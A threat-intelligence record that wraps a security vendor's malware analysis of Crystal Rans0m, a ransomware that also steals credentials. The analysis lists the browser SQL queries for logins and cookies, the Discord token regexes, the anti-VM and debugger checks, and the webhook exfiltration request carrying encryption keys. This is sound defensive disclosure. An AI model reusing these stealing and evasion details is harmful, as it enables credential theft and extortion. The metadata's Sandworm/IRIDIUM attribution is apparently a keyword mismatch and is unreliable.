{ "id": "3eeffcb6-06f3-4512-968e-0cd7fe80f4a5", "created_at": "2026-04-06T00:12:12.527004Z", "updated_at": "2026-04-10T03:37:08.595785Z", "deleted_at": null, "sha1_hash": "d2bf540cc8f1d9a7a0337e34cb61d79754087a1d", "title": "Crystal Rans0m: Emerging hybrid ransomware with stealer capabilities", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1086855, "plain_text": "Crystal Rans0m: Emerging hybrid ransomware with stealer\r\ncapabilities\r\nBy Lidia López Sanz Senior Threat Intelligence Analyst\r\nPublished: 2024-09-12 · Archived: 2026-04-05 14:07:58 UTC\r\nResearch \u0026 Threat Intel Last updated: 20 Sep 2024\r\nCrystal Rans0m is a previously undocumented hybrid ransomware family developed in Rust programming\r\nlanguage seen for the first time in the wild on September 2nd, 2023. Interestingly, it does not only encrypt victim’s\r\nfiles, demanding a ransom for their release, but also steals sensitive information from the infected systems.\r\nThis dual-threat approach means that attackers can double their leverage over victims, potentially increasing their\r\nchances of monetizing their attacks. Therefore, it can be categorized as a Stealer-as-a-Ransomware malware, a\r\nterm coined by Zscaler researchers in a publication about RedEnergy.\r\nRegarding attribution, Crystal Rans0m doesn’t share similarities to any other malware family, and it hasn’t been\r\nattributed to any known threat actor. In this post, we’ll analyze the technical capabilities of Crystal Rans0m,\r\ndescribing in detail both its hybrid ransomware and stealer components.\r\nEmergent threat: Hybrid ransomware\r\nSince double-extortion became prevalent with the most notable ransomware groups publishing confidential\r\ninformation from victims into a Data Leak Site (DLS), there have been multiple publications reporting the use of\r\nattack chains with different stages, that involve both an information stealer and a final ransomware payload.\r\nBy combining hybrid ransomware and stealer capabilities, attackers maximize the efficacy of their campaigns.\r\nEven if the ransom is not paid, the stolen data can be sold or used for further attacks, such as identity theft or spear\r\nphishing. It’s very uncommon to observe both types of malware categories in a single executable file. However,\r\nthis is the case of Crystal Rans0m, RedEnergy, and FTCODE.\r\nCurrently, ransomware groups seem to prefer to separate data exfiltration activities from encryption activities, but\r\nit’s important to pay attention to this emerging threat and how hybrid ransomware groups innovate on their TTPs.\r\nAnother documented case of hybrid ransomware is RAT-as-a-Ransomware, in the case of VenomRAT and\r\nAnarchy Panel RAT, embedding a ransomware component.\r\nTechnical analysis\r\nThis section will focus on a sample with sha256\r\n15219aa22db99f064c47c224a205cdd3ed438dabd2d2593242ed2882e6458311, which was the latest found at the\r\ntime of the analysis. The technical analysis will include first an overview of the initial actions carried out by the\r\nmalware, followed up by its main characteristics as a stealer and a ransomware. Finally, as Outpost24’s\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 1 of 20\n\nKrakenLabs team detected a new sample before publishing this blogpost, a final section contains the peculiarities\r\nof a newer sample from August 2024.\r\nKey functionalities\r\nEncrypts victim’s data to leverage for ransom demands\r\nRequests ransom payment in Monero, enhancing anonymity\r\nAs a stealer, it’s mainly focused on browsers, but it also targets Steam, Discord, and Riot Games clients\r\nUses Discord webhooks for command and control operations\r\nInitial actions\r\nPrior to any stealing or ransomware operations, Crystal loads its configuration:\r\nDecrypting the Discord Webhook used for exfiltration\r\nCrystal uses a Discord Webhook for exfiltrating both stolen data and the key and nonce used for encryption. This\r\nwebhook is hardcoded but it’s encrypted and encoded. So, among its initial configuration it proceeds to decrypt it,\r\nusing an also hardcoded key (also used to decrypt part of the ransom note), and simple XOR and array operations,\r\nthen decodes it using base 64.\r\nGenerating paths for targeted software\r\nAs part of its configuration, it also generates the paths for the data directories of targeted data (under\r\n“%localappdata%” or “%appdata%”). For the browsers, it generates two separate sets:\r\nC:\\Users\\MyPC\\AppData\\Roaming\\Opera Software\\Opera Stable\r\nC:\\Users\\MyPC\\AppData\\Roaming\\Opera Software\\Opera GX Stable\r\nC:\\Users\\MyPC\\AppData\\Local\\Amigo\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Torch\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Kometa\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Orbitum\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\CentBrowser\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\7Star\\7Star\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Spfutnik\\Sputnik\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Google\\Chrome SxS\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Vivaldi\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Microsoft\\Edge\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Iridium\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\uCozMedia\\Uran\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Google\\Chrome\\User Data\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 2 of 20\n\nIt also generates paths for standard Discord, Discord Canary, and Discord PTB.\nInfostealer component\nMalware working directory\nWhen grabbing a directory, a file or parsing the content of a file, Crystal will first create a new custom malware\nworking folder under “%Temp%\\wintemp.\\”. Then, the targeted file will be copied to the malware\nworking folder, read, and deleted when it is no longer necessary.\nThe deletion process does not use DeleteFileA/W APIs. To perform the file deletion, Crystal first opens the file\nwith FILE_FLAG_DELETE_ON_CLOSE flag, which will cause the file deletion once all its handles are closed.\nThen, it renames the file and moves it to “%Temp%” directory using SetFileInformationByHandle API, with\nFileRenameInfo as FileInformationClass parameter, and “\\\\?\\%Temp%\\rm-” as the new path.\nThis behavior is not specific to this malware family, but to the Rust library used to perform the deletion\n(remove_dir_alllibrary).\nStealing browser information\nGetting the browser’s masterkey\nIn order to steal the masterkey, Crystal iterates browser paths and checks if they are present in the host. If so, it\nwill try to locate their Local State file to extract the browser’s master key.\nCrystal creates a temporary malware working folder under “%Temp%\\wintemp.\\” and tries to copy “\\\n\\User Data\\Local State” file inside the MW working folder.\nIf successful, it will read its content and try to locate “os_crypt” key and “encrypted_key” key inside of it. Next, it\nwill decode the retrieved value, which is encoded in base64, remove the “DPAPI” suffix and call\nCryptUnprotectData API to obtain the master key.\nCollecting browser information\nOnce the masterkey is successfully obtained, Crystal will then iterate the files inside the browser’s “\\User Data”\ndirectory in order to locate the “\\Default” folder.\nThe following table shows the targeted SQLite DDBB, along with the SQL queries used to collect the information\nfrom them. Again, if found, the targeted files would be copied inside a malware working folder and read from\nthere.\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\nPage 3 of 20\n\nFile SQL Queries\r\n\u003cBrowser path\u003e\\User Data\\Default\\Login\r\nData\r\nSELECT origin_url, username_value,\r\npassword_value FROM logins\r\n\u003cBrowser path\u003e\\User Data\\Default\\History\r\nselect term from keyword_search_terms\r\nselect current_path, tab_url from downloads\r\nselect url from downloads_url_chains\r\n\u003cBrowser path\u003e\\User\r\nData\\Default\\Cookies\r\n\u003cBrowser path\u003e\\User\r\nData\\Default\\Network\\Cookies\r\nselect host_key, name, encrypted_value, path\r\nfrom cookies\r\nWhen the cookies information is retrieved, the “encrypted_value” will be decrypted using AES with the\r\npreviously obtained masterkey.\r\nStealing Discord information\r\nThe stealer targets Discord user’s data in two ways:\r\n1. From browsers\r\n2. From the Discord desktop application\r\nGetting Discord user tokens from browsers\r\nAfter getting the masterkey and calling the browser’s stealing function, it will try to locate “\\Local\r\nStorage\\leveldb” path inside the browser’s Default path. If found, it will iterate it, trying to locate “.log” or “.ldb”\r\nfiles. If any of them are found, it will search for Discord user tokens on their content, using the following regex:\r\n[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\r\nFrom Discord local client\r\nThe stealer tries to locate Discord paths and, if any are found, it tries to extract the masterkey with an equivalent\r\napproach to the one used for browsers. Then, it tries to locate any “.log” or “.lbd” files inside “leveldb” subpaths.\r\nIn this case, it will try to locate encrypted tokens using the following regex:\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 4 of 20\n\ndQw4w9WgXcQ:[^\\\"]*\r\nThe retrieved token is encoded in base64, so it will first be decoded and then decrypted using AES with the\r\nretrieved masterkey.\r\nFinal steps and data exfiltration\r\nGetting the victim’s IP\r\nPrior to exfiltrating the information, Crystal will try to obtain the victim’s IP from “hxxp://ifconfig[.] me”. This IP\r\nwill most likely be used as an identifier for the victim as will be shown in a later section (in the “Exfiltrating the\r\nkey” subsection). The structure of the request is equivalent for both requests. Nevertheless, in this first contact, the\r\n“Nonce” and “Key” are not sent as they have not yet been generated (the value field is filled with an underscore).\r\nGrabbing Steam files\r\nIf Steam is installed in the host (which is checked by searching for directory “C:\\Program Files (x86)\\Steam”), it\r\nwill try to grab “loginusers.vdf” and “ssfn” files.\r\nFirst, it will try to locate its “Config” subdirectory, and the “loginusers.vdf” file inside of it. Then, it iterates the\r\nSteam directory trying to locate “ssfn” files (Steam Sentry File), which is used to store Steam credentials.\r\nGrabbing Riot Games files\r\nThe stealer will try to locate “%LocalAppData%\\Riot Games\\Riot Client\\Data” directory and, if found, it will\r\ngrab all files it contains (including subdirectories).\r\nExfiltrating information\r\nThe collected information will be dumped in files (in memory) and exfiltrated with “Content-Disposition” header,\r\nusing “name” and “filename” directives.\r\nSee below an example of this data for exfiltrating the collected browser passwords:\r\nContent-Disposition: form-data; name=\"passwds\"; filename=\"passwords.txt\"\r\nThe table below summarizes the information exfiltrated:\r\nName Filename Description\r\npasswds passwords.txt Collected browser passwords\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 5 of 20\n\nName Filename Description\r\nhterms terms.txt Collected browser search history\r\nhdownload downloads.txt Collected browser downloads\r\nvisited visited.txt Collected browser visited sites\r\ncookies cookies.txt Collected browser cookies\r\ntkns.txt tkns.txt Collected Discord tokens\r\nsteam.zip steam.zip Grabbed Steam files\r\nriot.zip riot.zip Grabbed Riot files\r\nHybrid Ransomware component\r\nAs a hybrid ransomware, it iterates the system folders, searching for files to be encrypted. Apart from excluding\r\nWindows system folders, it contains a hardcoded set of directories to be excluded from encryption:\r\nAppData\r\nProgramData\r\nProgram Files\r\nProgram File(x86)\r\nLocal Settings\\\\Temp\r\nCrystal Rans0m uses SALSA20 for encryption, which is a stream cipher with symmetric encryption and uses a\r\n64-bit keystream.\r\nIt works by generating a continuous keystream of pseudo-random bits, which acts as a key, which is xored with\r\nthe plaintext to be encrypted.\r\nGenerating the key\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 6 of 20\n\nA random seed of 32 bytes is generated using BCryptGetRandom API during the first stages of execution.\r\nBCRYPT_USE_SYSTEM_PREFERRED_RNG flag is set as, which implies the use of “the system-preferred\r\nrandom number generator algorithm”.\r\nTwo pseudo-random values will be generated: a 32-byte key and an 8-byte nonce. These two values, along with\r\nfour 4-byte hardcoded strings and an 8-byte counter will be used to generate an initial 64-byte internal state.\r\nFigure 1. Salsa20 internal state matrix.\r\nThis process is executed for each file to encrypt, resulting in the same initial matrix.\r\nSalsa20 rounds\r\nHereunder, the salsa20 implementation to generate the final key can be observed:\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 7 of 20\n\nFigure 2. Salsa20 implementation (C/C++ code implementation from:\r\nhttps://en.wikipedia.org/wiki/Salsa20).\r\nFile encryption\r\nThe encryption process starts by reading the file content. Then, each byte will be xored with the corresponding\r\nkeystream byte. Finally, the encrypted content will be encoded in base64.\r\nThe hybrid ransomware does not modify the extension of the encrypted files.\r\nExfiltrating the key\r\nBoth the 32-byte key and 8-byte nonce are exfiltrated via the Discord webhook, using a POST request.\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 8 of 20\n\nThe communication between the malware and Discord is encrypted via SSL protocol. In order to do so, Crystal\r\nuses EncryptMessage API.\r\nThe following parameters and content of the request, prior encryption can be observed:\r\nPOST /api/webhooks/\u003cwebhook\u003e\r\nHTTP/1.1\r\ncontent-type: application/json\r\ncontent-length: \u003csize\u003e\r\naccept: */*\r\nhost: discord.com\r\n{\\\"content\\\": \\\"```IP: \u003cvictim’s IP\u003e\\\\nKey: \u003c32B generated Key\u003e\\\\nNonce: \u003c8B Nonce\u003e```\\\"}\r\nRansom note\r\nThe ransom note is written in “%Temp%\\gui.hta” and shown using mshta.exe (component that provides the\r\nMicrosoft HTML Application Host, which allows execution of .HTA (HTML Application) files). The main content\r\nof the ransom note is hardcoded in plain text. The rest of the information (HTML-formatted) is encrypted with\r\nXOR (using “0x9” as key in the analyzed sample) and encoded in base64.\r\nIt creates a batch file in the startup folder, responsible for reloading the ransom note in each restart.\r\nNewer version\r\nWhen we were about to publish this blog post, we found a new sample (sha256\r\nbed70b08cf8b00b4e6b04acd348b5e0343d207f3083e1c58261679706bd10318) from 6th August 2024. This\r\nsection will summarize the main aspects of this new sample in comparison to the one analyzed in the previous\r\nsections, and the older ones.\r\nThe main aspect to highlight is that we did not observe hybrid ransomware behavior in this new sample. This\r\nchange is reflected in the code in several ways, the main ones being: no salsa20 algorithm code is observed; the\r\nRust libraries related to this feature have been removed; the requests no longer contain the “Key” and “Nonce”\r\nfields, now it only sends the victim’s IP; and no references either to “mshta.exe” or the ransom note filename\r\n(“gui.hta”).\r\nThis new sample leads us to the hypothesis that Crystal is a modular solution, which allows the attacker to choose\r\nthe modules to deploy for each attack.\r\nAnother change is that this new sample contains a new Discord webhook, which is hardcoded in plain text, as\r\nopposed to the previous encrypted version.\r\nAnother relevant aspect to highlight is that this sample applies several techniques to avoid emulation and\r\ndebugging. Most of them were observed in older versions, not being present in the sample analyzed in previous\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 9 of 20\n\nsections. This new sample incorporates a new one based on registry checks.\r\nAnti-VM techniques\r\nIt checks if a hardcoded set of registry keys associated with VM software are present on the infected host\r\nusing RegOpenKeyExW API. If any key is found, it will abort its execution. The list of queried registry\r\nkeys can be found in Annex 2.\r\nThe stealer searches for processes associated with VM software in the running processes. The searched\r\nprocesses are:\r\nVmtoolsd.exe\r\nVmwaretrat.exe\r\nVmwareuser.exe\r\nvm_process.exe\r\nVmRemoteGuest.exe\r\nFinally, it checks if any of the following drivers associated with VM software is present in the host, using\r\nCreateFileW API:\r\nC:\\windows\\System32\\Drivers\\Vmmouse.sys\r\nC:\\windows\\System32\\Drivers\\vm3dgl.dll\r\nC:\\windows\\System32\\vmdum.dll\r\nC:\\windows\\System32\\Drivers\\VBoxGuest.sys\r\nIt also contains a time-based check to hinder the debugging process. In order to do so, it executes\r\nGetLocalTime and SystemTimeToFileTime APIs two times, subtracting the results and checking if the\r\ndifference is higher than 1,000. If so, it will end its execution\r\nAgain, it will iterate the running processes, this time comparing them against a list containing both\r\nprocesses associated with VMs and with analysis tools. Annex 2 also contains the list of processes searched\r\nin this check.\r\nAttribution\r\nThe ransom note includes some information that could serve as a starting point to attribute Crystal Rans0m\r\nactivity to a threat actor. The ransom note observed in the analyzed samples contain a Monero wallet address,\r\nSession id, and Discord exfiltration webhook. These indicators have not been observed in any other campaigns or\r\nmalware samples; therefore, we have not been able to attribute the Crystal Rans0m to any publicly known threat\r\nactor.\r\nSomething else that caught our attention is the use of the Session instant messaging application\r\n(getsession[.]org) as a communication method between the ransomware operator and the victim for negotiation.\r\nAs of August 2024, it is highly unusual to see ransomware groups using Session, as we have only located dozens\r\nof ransom notes with a unique Session id, including, for instance, SEXi ransomware. The most frequently\r\nobserved contact methods for ransomware negotiations are email, Jabber, and Tox.\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 10 of 20\n\nRansom note\r\nUpon execution, a new window with the ransom note is shown on the screen. It has the title “Crystal Rans0m”,\r\nwhich has allowed us to know the name the authors have originally given to the malware. The message announces\r\nto victims all their files have been encrypted and that if they want to restore access to their data, they must pay\r\nUS$50 in XMR (Monero cryptocurrency) to the attackers and contact them by opening a chat conversation on\r\nSession.\r\nFigure 3. Ransom note shown to the victim (sample\r\n15219aa22db99f064c47c224a205cdd3ed438dabd2d2593242ed2882e6458311)\r\nOlder versions contained a countdown instead of the hardcoded message observed above, which contains a\r\nspelling error.\r\nFigure 4. Ransom note shown to the victim (sample\r\nb027fe1e1e97d980de593cfd265d004b310c7655d3ee27ea3f10beaf70285e22)\r\nIt is worth mentioning that in the older sample retrieved, the ransom note was supposed to contain a qTox ID, but\r\nit seems to be a draft as no real ID nor cryptocurrency wallet were written. It also demanded a higher amount.\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 11 of 20\n\nFigure 5. Ransom note shown to the victim (sample\r\n693fb42336167d5432a807fcb9afcac7002113fc37b05a2d3aa61c1356256c52)\r\nThe choice of Monero wallet to charge the ransom prevents us from analyzing how effective, widespread, and\r\nprofitable the usage of Crystal Rans0m has been. Unlike Bitcoin and other major cryptocurrencies, Monero\r\ntransactions can be verified, but are anonymous and cannot be traced to the originating or recipient wallet address.\r\nThat is the reason why many threat actors prefer to use Monero over more popular and easy-to-use\r\ncryptocurrencies like Bitcoin and Ethereum.\r\nVictimology\r\nAlthough there is a low count of malware samples available, analyzing the origin of VirusTotal submissions gives\r\nsome clue of the location of the potential victims so far. Notably, we have observed a higher number of\r\nsubmissions from Italy and Russia.\r\nHowever, the motivation of the threat actor behind Crystal Rans0m is financial gain and therefore, we do not\r\nassess the adversary aims at targeting specific countries or industries but targets indiscriminately.\r\nCountry Submissions Percent\r\nItaly 4 20%\r\nRussian Federation 4 20%\r\nUkraine 2 10%\r\nGeorgia 1 5%\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 12 of 20\n\nCountry Submissions Percent\r\nLithuania 1 5%\r\nChina 1 5%\r\nUnited States 1 5%\r\nPeru 1 5%\r\nUnited Kingdom 1 5%\r\nPhilippines 1 5%\r\nArgentina 1 5%\r\nSweden 1 5%\r\nBrazil 1 5%\r\nKey takeaways\r\nCrystal Rans0m is a rather simple low-prevalence malware, that, however, has some distinct characteristics\r\nworthy of attention. Its combination of info-stealing and file encryption capabilities puts this malware family in\r\nthe rare category of Stealer-as-Ransomware. Crystal Rans0m exemplifies the dangerous potential of this hybrid\r\nthreat, emphasizing the need for advanced security measures and comprehensive incident response strategies,\r\nthat’s how you can approach and remove hbrid reansom\r\nOrganizations must stay vigilant and proactive to protect themselves from these dual threats that aim to steal\r\nsensitive data and encrypt files at the same time. Outpost24 KrakenLabs’ analysts will continue to monitor the\r\nstate of hybrid ransomware and analyze its potential to become a trend within the ransomware landscape.\r\nProtect your organization with Threat Intelligence\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 13 of 20\n\nOutpost24’s Threat Context lets you monitor emerging threats such as Crystal Rans0m, track your organization’s\r\nfootprint on the dark web, and gain contextual intelligence around threat actors and their campaigns. Book a live\r\ndemo today.\r\nUnsure where to start with threat intelligence? Speak to an expert about the best fit for your organization.\r\nTTPs\r\nExecution\r\nT1059 – Command and Scripting Interpreter\r\nPersistence\r\nT1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nDefense Evasion\r\nT1027 – Obfuscated Files or Information\r\nT1140 – Deobfuscate/Decode Files or Information\r\nT1055 – Process Injection\r\nT1562.001 – Impair Defenses: Disable or Modify Tools\r\nT1497 – Virtualization/Sandbox Evasion\r\nDiscovery\r\nT1082 – System Information Discovery\r\nCollection\r\nT1555.003 – Credentials from Password Stores: Credentials from Web Browsers\r\nExfiltration\r\nT1567.004 – Exfiltration Over Web Service: Exfiltration Over Webhook\r\nImpact\r\nT1486 – Data Encrypted for Impact\r\nT1657 – Financial theft\r\nIOCs\r\nCrystal Rans0m hashes\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 14 of 20\n\nbed70b08cf8b00b4e6b04acd348b5e0343d207f3083e1c58261679706bd10318\r\n15219aa22db99f064c47c224a205cdd3ed438dabd2d2593242ed2882e6458311\r\nb027fe1e1e97d980de593cfd265d004b310c7655d3ee27ea3f10beaf70285e22\r\n4970bd280da663f483f927f3a6c47833ebcbfe2b640ee66a309b41c7ed084375\r\n693fb42336167d5432a807fcb9afcac7002113fc37b05a2d3aa61c1356256c52\r\nDiscord webhook used for data exfiltration\r\nhxxps://discord[.]com/api/webhooks/1270187531933057115/OTYZL7aHM9A-o9RxQmRvXz_YkOC_qc8MhVD3vPFP0aXhhcBkCW_FokOo\r\nhxxps://discord[.]com/api/webhooks/1144625488816525372/uYBmr5tVjy1fAqE3FP5t7jbdaWTQcY5mmRZSJavfml9zU2QqWBq-4oDV\r\nMonero cryptocurrency wallet address\r\n4A5tWDtKsqSX1bXPrjycV422D9oov73gEJxr1CUmhXMAfVqyhcmZvhPHBeW9ztrp584kkd3BW4xk9XW4PdAG3p2wMBcaRbJ\r\nSession id\r\n05c34f70f377339720875a54bfb754a31311ed994986cfd51e7fa56114b7bd1c0f\r\nMalware working folder\r\nC:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\wintemp.[STRING]\r\nANNEX 1: Targeted software\r\nSoftware Path\r\nOpera \\Opera Software\\Opera Stable\r\nOpera \\Opera Software\\Opera GX Stable\r\nAmigo \\Amigo\\User Data\r\nTorch \\Torch\\User Data\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 15 of 20\n\nSoftware Path\r\nKometa \\Kometa\\User Data\r\nOrbitum \\Orbitum\\User Data\r\nCentBrowser \\CentBrowser\\User Data\r\n7Star \\7Star\\7Star\\User Data\r\nSputnik \\Sputnik\\Sputnik\\User Data\r\nChrome SxS \\Google\\Chrome SxS\\User Data\r\nVivaldi \\Vivaldi\\User Data\r\nMicrosoft Edge \\Microsoft\\Edge\\User Data\r\nYandex \\Yandex\\YandexBrowser\\User Data\r\nIridium \\Iridium\\User Data\r\nIridium \\uCozMedia\\Uran\\User Data\r\nBrave \\BraveSoftware\\Brave-Browser\\User Data\r\nChrome \\Google\\Chrome\\User Data\r\nDiscord \\discord\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 16 of 20\n\nSoftware Path\r\nDiscord Canary \\discordcanary\r\nDiscord PTB \\discordptb\r\nRiot Games \\AppData\\Local\\Riot Games\\Riot Client\\Data\r\nANNEX 2: “Anti” checks\r\nRegistry keys\r\nSoftware\\Classes\\Folder\\shell\\sandbox\r\nSOFTWARE\\Microsoft\\Hyper-V\r\nSOFTWARE\\Microsoft\\VirtualMachine\r\nSOFTWARE\\Microsoft\\Virtual Machine\\Guest\\Parameters\r\nSYSTEM\\ControlSet001\\Services\\vmicheartbeat\r\nSYSTEM\\ControlSet001\\Services\\vmicvss\r\nSYSTEM\\ControlSet001\\Services\\vmicshutdown\r\nSYSTEM\\ControlSet001\\Services\\vmicexchange\r\nSYSTEM\\CurrentControlSet\\Enum\\PCI\\VEN_1AB8*\r\nSYSTEM\\CurrentControlSet\\Services\\SbieDrv\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Sandboxie\r\nHARDWARE\\ACPI\\DSDT\\VBOX__\r\nHARDWARE\\ACPI\\FADT\\VBOX__\r\nHARDWARE\\ACPI\\RSDT\\VBOX__\r\nSOFTWARE\\Oracle\\VirtualBox Guest Additions\r\nSYSTEM\\ControlSet001\\Services\\VBoxGuest\r\nSYSTEM\\ControlSet001\\Services\\VBoxMouse\r\nSYSTEM\\ControlSet001\\Services\\VBoxService\r\nSYSTEM\\ControlSet001\\Services\\VBoxSF\r\nSYSTEM\\ControlSet001\\Services\\VBoxVideo\r\nSYSTEM\\ControlSet001\\Services\\vpcbus\r\nSYSTEM\\ControlSet001\\Services\\vpc-s3\r\nSYSTEM\\ControlSet001\\Services\\vpcuhub\r\nSYSTEM\\ControlSet001\\Services\\msvmmouf\r\nSOFTWARE\\VMware, Inc.\\VMware Tools\r\nSYSTEM\\ControlSet001\\Services\\vmdebug\r\nSYSTEM\\ControlSet001\\Services\\vmmouse\r\nSYSTEM\\ControlSet001\\Services\\VMTools\r\nSYSTEM\\ControlSet001\\Services\\VMMEMCTL\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 17 of 20\n\nSYSTEM\\ControlSet001\\Services\\vmware\r\nSYSTEM\\ControlSet001\\Services\\vmci\r\nSYSTEM\\ControlSet001\\Services\\vmx86\r\nSOFTWARE\\Wine\r\nHARDWARE\\ACPI\\DSDT\\xen\r\nHARDWARE\\ACPI\\FADT\\xen\r\nHARDWARE\\ACPI\\RSDT\\xen\r\nSYSTEM\\ControlSet001\\Services\\xenevtchn\r\nSYSTEM\\ControlSet001\\Services\\xennet\r\nSYSTEM\\ControlSet001\\Services\\xennet6\r\nSYSTEM\\ControlSet001\\Services\\xensvc\r\nSYSTEM\\ControlSet001\\Services\\xenvdb\r\nProcesses associated with analysis tools\r\nhttp toolkit.exe\r\nhttpdebuggerui.exe\r\nwireshark.exe\r\nfiddler.exe\r\ncharles.exe\r\nregedit.exe\r\ncmd.exe\r\ntaskmgr.exe\r\nvboxservice.exe\r\ndf5serv.exe\r\nprocesshacker.exe\r\nvboxtray.exe\r\nvmtoolsd.exe\r\nvmwaretray.exe\r\nida64.exe\r\nollydbg.exe\r\npestudio.exe\r\nvmwareuser\r\nvgauthservice.exe\r\nvmacthlp.exe\r\nx96dbg.exe\r\nvmsrvc.exe\r\nx32dbg.exe\r\nvmusrvc.exe\r\nprl_cc.exe\r\nprl_tools.exe\r\nqemu-ga.exe\r\njoeboxcontrol.exe\r\nksdumperclient.exe\r\nksdumper.exe\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 18 of 20\n\njoeboxserver.exe\r\nxenservice.exe\r\nAbout the Author\r\nLidia is a Senior Threat Intelligence Analyst at Outpost24’s KrakenLabs Strategic Research team. Her role\r\ninvolves researching and profiling threat actors, monitoring their campaigns, IOCs, and TTPs. She also creates\r\nthreat intelligence reports and keeps a close eye on fraudulent activity in the cybercriminal underground.\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 19 of 20\n\nOutpost24’s Cyber Threat Intelligence team helps businesses stay ahead of malicious actors in the ever-evolving\r\nthreat landscape, helping you keep your assets and brand reputation safe. With a comprehensive threat hunting\r\ninfrastructure, our Threat Intelligence solution covers a broad range of threats on the market to help your business\r\ndetect and deter external threats.\r\nSource: https://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://outpost24.com/blog/crystal-ransom-hybrid-ransomware/" ], "report_names": [ "crystal-ransom-hybrid-ransomware" ], "threat_actors": [ { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ddf5aa3a-099f-4592-bb25-58ba16d6bb77", "created_at": "2024-06-07T02:00:04.008432Z", "updated_at": "2026-04-10T02:00:03.647153Z", "deleted_at": null, "main_name": "SEXi", "aliases": [], "source_name": "MISPGALAXY:SEXi", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", 